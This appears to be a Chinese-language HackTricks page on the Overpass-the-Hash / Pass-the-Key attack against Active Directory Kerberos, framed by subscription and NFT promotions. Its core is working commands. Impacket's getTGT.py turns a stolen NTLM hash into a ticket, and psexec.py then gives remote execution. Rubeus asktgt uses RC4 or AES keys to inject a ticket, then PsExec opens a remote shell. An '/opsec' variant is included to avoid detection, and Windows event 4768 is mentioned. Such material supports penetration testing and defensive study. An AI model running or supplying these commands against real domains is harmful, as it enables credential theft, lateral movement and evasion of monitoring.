hacktricks/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md

Over Pass the Hash/Pass the Key

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS红队专家）！

• 您在网络安全公司工作吗？ 想要看到您的公司在HackTricks中做广告吗？ 或者想要访问PEASS的最新版本或下载PDF格式的HackTricks吗？ 请查看订阅计划!
• 发现PEASS家族，我们的独家NFT收藏品
• 获取官方PEASS和HackTricks周边产品
• 加入 💬 Discord群 或 电报群 或在Twitter上关注我 🐦@carlospolopm。
• 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享您的黑客技巧。

{% embed url="https://websec.nl/" %}

Overpass The Hash/Pass The Key (PTK)

**Overpass The Hash/Pass The Key (PTK)**攻击旨在针对传统NTLM协议受限且Kerberos认证优先的环境。该攻击利用用户的NTLM哈希或AES密钥来获取Kerberos票据，从而未经授权地访问网络中的资源。

要执行此攻击，初始步骤涉及获取目标用户帐户的NTLM哈希或密码。在获得此信息后，可以获取帐户的票据授予票据（TGT），使攻击者能够访问用户具有权限的服务或计算机。

该过程可以通过以下命令启动：

python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass

对于需要使用AES256的情况，可以利用-aesKey [AES key]选项。此外，获取的票据可以与各种工具一起使用，包括smbexec.py或wmiexec.py，从而扩大攻击范围。

遇到诸如_PyAsn1Error_或_KDC cannot find the name_等问题通常可以通过更新Impacket库或使用主机名代替IP地址来解决，确保与Kerberos KDC兼容。

使用Rubeus.exe的另一种命令序列展示了这种技术的另一个方面：

.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd

这种方法反映了通过密钥传递的方法，重点是挪用并直接利用票证进行认证。值得注意的是，发起TGT请求会触发事件4768：请求了一个Kerberos认证票证（TGT），默认情况下表示使用RC4-HMAC，尽管现代Windows系统更倾向于AES256。

为了符合运行安全性并使用AES256，可以应用以下命令：

.\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec

参考

• https://www.tarlogic.com/es/blog/como-atacar-kerberos/

{% embed url="https://websec.nl/" %}

从零开始学习 AWS 黑客技术，成为专家 htARTE (HackTricks AWS Red Team Expert)!

• 你在网络安全公司工作吗？想要看到你的公司在 HackTricks 中被宣传吗？或者想要访问PEASS 的最新版本或下载 HackTricks 的 PDF吗？查看订阅计划!
• 探索PEASS 家族，我们的独家NFTs
• 获取官方 PEASS & HackTricks 商品
• 加入 💬 Discord 群组 或 电报群组 或关注我的Twitter 🐦@carlospolopm。
• 通过向 hacktricks 仓库 和 hacktricks-cloud 仓库 提交 PR 来分享你的黑客技巧。